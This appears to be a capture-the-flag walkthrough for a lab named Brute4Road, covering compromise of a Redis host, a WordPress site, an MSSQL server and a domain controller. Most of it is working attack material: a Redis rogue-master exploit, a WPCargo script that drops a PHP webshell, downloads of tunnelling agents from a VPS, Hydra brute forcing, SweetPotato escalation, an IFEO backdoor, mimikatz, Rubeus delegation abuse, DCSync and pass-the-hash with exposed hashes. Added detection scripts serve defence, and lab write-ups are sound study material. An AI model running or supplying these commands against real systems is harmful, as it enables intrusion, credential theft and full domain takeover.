Brute4Road

1. Key points

2. Tools

3. flag01

fscan scan
Pasted image 20250217112827
Redis is reachable without authentication.
Connect with MDUT.

3.1. Redis master-replica replication RCE

python3 redis-rogue-server.py --rhost 39.98.109.170 --lhost 124.71.111.64 

Remember to open port 21000 on your VPS: that is the port the rogue master listens on, and the target must be able to connect back to it for the replication sync.
Once it runs you get an interactive shell on the Redis host.
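The exchange redis-rogue-server automates, as an added example that is not part of the writeup or of the tool's own code. It shows both sides: the commands the attacker sends to the unauthenticated target, and the replies the rogue master gives during the replication handshake so that the replica writes our payload to `<dir>/<dbfilename>`. The module bytes are a constructed placeholder (the real tool ships a compiled `exp.so`), and the demo runs master and replica on a loopback port instead of the VPS and 21000.

```python
import socket
import threading

# Constructed stand-in for the malicious module; the real tool ships a compiled exp.so
# exporting a system.exec command. Only the transport is demonstrated here.
FAKE_MODULE = b"\x7fELF-constructed-module-bytes-not-a-real-module"

def resp_encode(*args) -> bytes:
    """Encode a command as a RESP array of bulk strings, the wire form redis-cli uses."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode() if isinstance(arg, str) else arg
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)

def command_name(request: bytes) -> bytes:
    """Return the command word from a RESP-array or inline request sent by the replica."""
    for token in request.split(b"\r\n"):
        if token and token[:1] not in (b"*", b"$"):
            return token.split(b" ")[0].upper()
    return b""

def rogue_master_reply(request: bytes, payload: bytes) -> bytes:
    """What the rogue master answers during the replication handshake.
    On PSYNC it sends a FULLRESYNC header followed by `payload` framed as an RDB
    snapshot; the replica saves that body as <dir>/<dbfilename>, i.e. our exp.so."""
    cmd = command_name(request)
    if cmd == b"PING":
        return b"+PONG\r\n"
    if cmd == b"REPLCONF":
        return b"+OK\r\n"
    if cmd in (b"PSYNC", b"SYNC"):
        return b"+FULLRESYNC " + b"Z" * 40 + b" 1\r\n" + b"$%d\r\n" % len(payload) + payload
    return b"-ERR unknown command\r\n"

def attacker_commands(lhost: str, lport: int, dump_dir: str = "/tmp", filename: str = "exp.so"):
    """Commands sent to the unauthenticated target, in order: point its dump file at
    <dump_dir>/<filename>, make it replicate from us, load the dropped file as a module
    (once the sync has completed), then detach and restore the filename."""
    return [
        resp_encode("CONFIG", "SET", "dir", dump_dir),
        resp_encode("CONFIG", "SET", "dbfilename", filename),
        resp_encode("SLAVEOF", lhost, str(lport)),
        resp_encode("MODULE", "LOAD", f"{dump_dir}/{filename}"),
        resp_encode("SLAVEOF", "NO", "ONE"),
        resp_encode("CONFIG", "SET", "dbfilename", "dump.rdb"),
    ]

def serve_rogue_master(payload: bytes, port: int = 0):
    """One-shot rogue master on 127.0.0.1 (the real tool binds the VPS on 21000)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", port))
    srv.listen(1)

    def handle():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(rogue_master_reply(data, payload))
                if command_name(data) in (b"PSYNC", b"SYNC"):
                    break
        srv.close()

    thread = threading.Thread(target=handle, daemon=True)
    thread.start()
    return srv.getsockname()[1], thread

def replica_handshake(port: int) -> bytes:
    """Play the target's side after SLAVEOF and return the body it would write to disk."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.sendall(resp_encode("PING"))
        if s.recv(64) != b"+PONG\r\n":
            raise RuntimeError("no PONG from master")
        s.sendall(resp_encode("REPLCONF", "listening-port", "6379"))
        if s.recv(64) != b"+OK\r\n":
            raise RuntimeError("REPLCONF rejected")
        s.sendall(resp_encode("PSYNC", "?", "-1"))
        buf = b""
        while chunk := s.recv(4096):
            buf += chunk
    # buf == b"+FULLRESYNC <runid> 1\r\n$<len>\r\n<payload>"
    hdr_end = buf.index(b"\r\n")
    len_end = buf.index(b"\r\n", hdr_end + 2)
    length = int(buf[hdr_end + 3:len_end])
    return buf[len_end + 2:len_end + 2 + length]

if __name__ == "__main__":
    port, t = serve_rogue_master(FAKE_MODULE)
    assert replica_handshake(port) == FAKE_MODULE
    t.join()
    for c in attacker_commands("124.71.111.64", 21000):
        print(c)
```

The defensive read of the same exchange: a Redis that accepts `CONFIG SET dir`/`dbfilename` and `SLAVEOF` from an unauthenticated client, and has `MODULE LOAD` enabled, is one replication handshake away from native code execution; `requirepass`, binding to localhost, and `rename-command`/ACL restrictions on `CONFIG`, `SLAVEOF`/`REPLICAOF` and `MODULE` each break a step of this sequence.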

3.1.1. Privilege escalation on the Redis host (SUID check)

find / -perm -4000 2>/dev/null

base64 has the SUID bit set, so it reads files with the owner's privileges.
Pasted image 20250217114713

Read the flag with base64 (encode as root, then decode locally):

base64 "/home/redis/flag/flag01" | base64 --decode

Pasted image 20250217114627

4. flag02

4.1. Setting up the internal-network proxy (Stowaway)

# admin side (VPS)
./linux_x64_admin -l 1122

# agent side (Redis host)
wget http://124.71.111.64/stowaway_agent
chmod +x stowaway_agent
./stowaway_agent -c 124.71.111.64:1122

# admin side: select the node and start a SOCKS listener on 1123
use 0
socks 1123

4.2. Internal network scan

wget http://124.71.111.64/fscan
./fscan -h 172.22.2.7/24

Targets

172.22.2.16   MSSQLSERVER.xiaorang.lab   MSSQL database server
172.22.2.7    Redis                      compromised (flag01)
172.22.2.34   XIAORANG\CLIENT01
172.22.2.3    DC.xiaorang.lab            domain controller
172.22.2.18   WORKGROUP\UBUNTU-WEB02     WordPress site, compromised (next step)

4.3. wpscan: WPCargo plugin unauthenticated RCE

Scan the WordPress site with wpscan through the SOCKS proxy:

proxychains wpscan --url http://172.22.2.18 --api-token xxx

The installed WPCargo plugin has an unauthenticated RCE: its barcode.php writes a PNG to a caller-supplied filepath without any authentication.
Pasted image 20250217120133

import sys
import binascii
import requests

# 172.22.2.18 is only reachable from inside the network, so run this through the
# SOCKS proxy from 4.1, e.g. `proxychains python3 wpcargo.py whoami`.

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int) -> str:
    # 8-bit binary of one byte, with '0' bits written as 'x'
    return '{:08b}'.format(c).replace('0', 'x')

# Concatenate the bit patterns; the leading bit is dropped, as in the original exploit
text = ''.join(encode_character_code(c) for c in binascii.unhexlify(payload))[1:]

destination_url = 'http://172.22.2.18/'
cmd = sys.argv[1] if len(sys.argv) > 1 else 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
# barcode.php needs no authentication and writes the PNG wherever filepath= points.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php"
    f"?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# The "PNG" now contains <?=$_GET[1]($_POST[2]);?> and is served as /webshell.php:
# 1=<PHP function name> in the query string, 2=<its argument> in the POST body.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

Running the script drops the webshell.

Test it:

http://172.22.2.18/webshell.php?1=system
POST 2=whoami

Pasted image 20250217121148
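The detection side of this step, as an added example that is not part of the writeup: a small scanner over web-server access logs that flags barcode.php requests carrying a `filepath=` parameter (high severity when the target has a script extension) and then correlates later hits on the dropped file name. The log lines are constructed to mirror the shape of the exploit's requests; the path and parameter names come from the script above, the extension list and severities are my assumptions.

```python
import re
from posixpath import basename
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (not captured from the lab): the first two mirror
# the exploit's two requests, the last two are ordinary traffic that must not be flagged.
SAMPLE_LOG = """\
172.22.2.7 - - [17/Feb/2025:12:01:33 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=1x1x1&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php HTTP/1.1" 200 311 "-" "python-requests/2.31.0"
172.22.2.7 - - [17/Feb/2025:12:01:34 +0800] "POST /webshell.php?1=system HTTP/1.1" 200 52 "-" "python-requests/2.31.0"
10.0.0.5 - - [17/Feb/2025:12:02:10 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=ORDER123&size=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Feb/2025:12:03:00 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
BARCODE_PATH = "/wp-content/plugins/wpcargo/includes/barcode.php"
# Extensions PHP-FPM/Apache will commonly execute (assumed list; extend per deployment)
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7")

def detect(log_text: str) -> List[Dict[str, str]]:
    """Return findings for WPCargo barcode.php file writes and follow-up use of the dropped file."""
    findings: List[Dict[str, str]] = []
    dropped = set()  # basenames written via filepath=, used to correlate the second stage
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.endswith(BARCODE_PATH) and "filepath" in parse_qs(url.query):
            # parse_qs already decodes once; a second unquote catches double-encoding tricks
            target_file = unquote(parse_qs(url.query)["filepath"][0])
            severity = "high" if target_file.lower().endswith(SCRIPT_EXTS) else "medium"
            findings.append({
                "kind": "wpcargo_barcode_file_write", "severity": severity,
                "src": m["ip"], "time": m["ts"], "filepath": target_file,
            })
            dropped.add(basename(target_file))
        elif basename(url.path) in dropped:
            findings.append({
                "kind": "dropped_file_accessed", "severity": "high",
                "src": m["ip"], "time": m["ts"], "method": m["method"], "path": url.path,
            })
    return findings

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

The third sample line is a legitimate barcode request (no `filepath=`), which is why the rule keys on the parameter rather than on the endpoint alone; the plugin's legitimate use of that parameter is exactly what makes the bug exploitable, so any value pointing outside the upload directory deserves a look even without a script extension.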

4.4. Connecting to the database with AntSword

Make sure the correct connection type is selected.
Use the file manager to read the database configuration file (wp-config.php holds the credentials), then connect to the database from inside AntSword.

flag02 is in the database.

Alongside it there is a hint and a wordlist; export the wordlist.
Pasted image 20250217123322

5. flag03

5.1. Brute-forcing the database password

Run Hydra with the exported wordlist against the MSSQL server, through the proxy:

proxychains -q hydra -l sa -P passwd.txt mssql://172.22.2.16

Pasted image 20250217123715
Password obtained: ElGNkOiC

5.2. Connecting to MSSQL with MDUT

Checking privileges shows the service account has SeImpersonatePrivilege,
so we can escalate to SYSTEM with SweetPotato.
Pasted image 20250217124730

5.3. Privilege escalation through the database

After enabling the command-execution component in MDUT, files can be uploaded; then run the escalation binary:

C:/Users/Public/SweetPotato.exe

5.4. Creating an admin user and connecting over RDP

netstat shows 3389 listening, so add a user and connect over RDP:

C:/Users/Public/SweetPotato.exe -a "netstat -ano"

Pasted image 20250217132950
Create a new local administrator user:

C:/Users/Public/SweetPotato.exe -a "net user  c1trus qwer123! /add"
C:/Users/Public/SweetPotato.exe -a "net localgroup administrators c1trus /add"

RDP in
Pasted image 20250217133304
and grab the flag.

5.5. Getting a SYSTEM cmd

Register cmd.exe as the Image File Execution Options debugger for magnify.exe; launching Magnifier from the Ease of Access menu on the logon screen then spawns cmd.exe as SYSTEM:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f
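The check a defender would run after this kind of access, as an added example that is not part of the writeup: parse the output of `reg query "HKLM\...\Image File Execution Options" /s /v Debugger` and flag any Debugger value, with high severity when the hijacked image is one of the accessibility binaries that run as SYSTEM from the logon screen or when the debugger is itself a shell. The registry output below is constructed (only the magnify.exe entry matches what the reg add above creates); the binary and shell lists are my assumptions.

```python
import re
from typing import Dict, List

# Constructed output of:
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s /v Debugger
# (not captured from the lab host). The notepad.exe entry stands in for a developer's real debugger.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe
    Debugger    REG_SZ    c:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
    Debugger    REG_SZ    "C:\Program Files\Debugging Tools\windbg.exe" -g

End of search: 2 match(es) found.
"""

# Accessibility helpers reachable from the logon screen, where they run as SYSTEM (assumed list)
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe",
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DEBUGGER_RE = re.compile(r"^\s+Debugger\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$")

def debugger_executable(value: str) -> str:
    """Basename of the executable in a Debugger value, handling quoted paths and trailing arguments."""
    exe_path = value.strip().strip('"').split('"')[0]
    return exe_path.rsplit("\\", 1)[-1].split()[0].lower()

def find_ifeo_debuggers(reg_output: str) -> List[Dict[str, str]]:
    """Return one finding per Debugger value found under Image File Execution Options."""
    findings: List[Dict[str, str]] = []
    key = None
    for line in reg_output.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = DEBUGGER_RE.match(line)
        if not (m and key):
            continue
        image = key.rsplit("\\", 1)[-1].lower()
        dbg = debugger_executable(m.group(1))
        severity = "high" if image in ACCESSIBILITY_BINARIES or dbg in SHELLS else "review"
        findings.append({"image": image, "debugger": m.group(1), "severity": severity, "key": key})
    return findings

if __name__ == "__main__":
    for f in find_ifeo_debuggers(SAMPLE_REG_QUERY):
        print(f["severity"], f["image"], "->", f["debugger"])
```

On a live host the same logic can be fed from `winreg` or from Sysmon event ID 13 (registry value set) filtered on the IFEO path, which also catches the `reg add` at the moment it happens rather than on the next audit.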

Collect domain information:

sharphound.exe -c all

Dump the MSSQLSERVER$ machine account hash:

mimikatz.exe
privilege::debug
log 1.txt
sekurlsa::logonpasswords

5.6. Bringing a SYSTEM session into MSF (optional)

Generate a bind payload (it listens on the target, and we connect in through the SOCKS proxy):

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4455 -f exe -o msf4455.exe

Run it as SYSTEM via SweetPotato:

C:/Users/Public/sweetpotato.exe -a C:/Users/Public/msf4455.exe

Connect to it:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 172.22.2.16
set lport 4455
run

Pasted image 20250218210955

Fail

Not sure why the 64-bit payload won't connect.
Pasted image 20250218214524
Credentials could not be dumped.
Pasted image 20250218214749

6. flag04

This host is domain-joined, so we can work against the domain from here.

6.1. Constrained delegation attack

The mimikatz output contains the NTLM hash of the MSSQLSERVER$ machine account.
Pasted image 20250217144427

Check which delegation the MSSQLSERVER$ machine account is configured for:

Import-Module PowerView.ps1
Get-DomainComputer -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto

MSSQLSERVER$ has constrained delegation configured to the LDAP and CIFS services on the DC.
Pasted image 20250218223428
First, use Rubeus with the MSSQLSERVER$ credential (its NTLM hash, passed as the RC4 key) to request a TGT from the KDC and print it as base64.
MSSQLSERVER$ NTLM hash:
fb485e69a4e0da60139181076daa010b

Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:fb485e69a4e0da60139181076daa010b /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap 

Pasted image 20250217144516
Then use that TGT with the S4U2self and S4U2proxy extensions: Rubeus first obtains a forwardable ticket to itself on behalf of Administrator, then exchanges it at the TGS for a service ticket (ST) to LDAP/DC.xiaorang.lab as Administrator,
and injects it into memory (/ptt):

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 TGT from the previous step>

Pasted image 20250217144630

6.2. DCSync

With an ST for the DC's LDAP service as Administrator in memory, we can talk to the domain controller, and that is enough for a DCSync with mimikatz:

lsadump::dcsync /domain:xiaorang.lab /user:Administrator

Pasted image 20250217144810
Domain administrator NTLM hash:
1a19251fbd935969832616366ae3fe62

6.3. Pass-the-hash

proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 Administrator@172.22.2.3 -codec gbk

Grab the flag.